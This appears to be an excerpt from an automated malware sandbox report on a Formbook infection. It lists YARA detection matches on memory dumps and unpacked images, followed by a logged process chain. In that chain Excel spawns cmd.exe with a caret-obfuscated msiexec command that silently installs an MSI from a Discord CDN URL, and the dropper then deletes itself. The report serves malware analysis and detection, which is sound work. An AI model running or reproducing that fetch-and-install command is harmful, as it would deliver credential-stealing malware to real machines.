Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2343801628.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2096304655.0000000000710000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2149044072.0000000000400000.00000040.00000001.sdmp, type: MEMORY |
Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY |
Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 00000009.00000002.2344499238.0000000001F20000.00000004.00000001.sdmp, type: MEMORY |
Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 7.2.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE |
Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 6.2.MSID8B1.tmp.710000.3.unpack, type: UNPACKEDPE |
Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 7.2.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE |
Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 6.2.MSID8B1.tmp.710000.3.raw.unpack, type: UNPACKEDPE |
Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 7.1.MSID8B1.tmp.400000.0.raw.unpack, type: UNPACKEDPE |
Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE |
Source: 7.1.MSID8B1.tmp.400000.0.unpack, type: UNPACKEDPE |
Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research |
Source: unknown |
Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C m^SiE^x^e^c /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\msiexec.exe mSiExec /i https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi /qn |
|
Source: unknown |
Process created: C:\Windows\Installer\MSID8B1.tmp C:\Windows\Installer\MSID8B1.tmp |
|
Source: C:\Windows\Installer\MSID8B1.tmp |
Process created: C:\Windows\Installer\MSID8B1.tmp C:\Windows\Installer\MSID8B1.tmp |
|
Source: C:\Windows\Installer\MSID8B1.tmp |
Process created: C:\Windows\SysWOW64\wininit.exe C:\Windows\SysWOW64\wininit.exe |
|
Source: C:\Windows\SysWOW64\wininit.exe |
Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Installer\MSID8B1.tmp' |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Installer\MSID8B1.tmp |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\wininit.exe |
Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\cmd.exe |
Process information set: NOOPENFILEERRORBOX |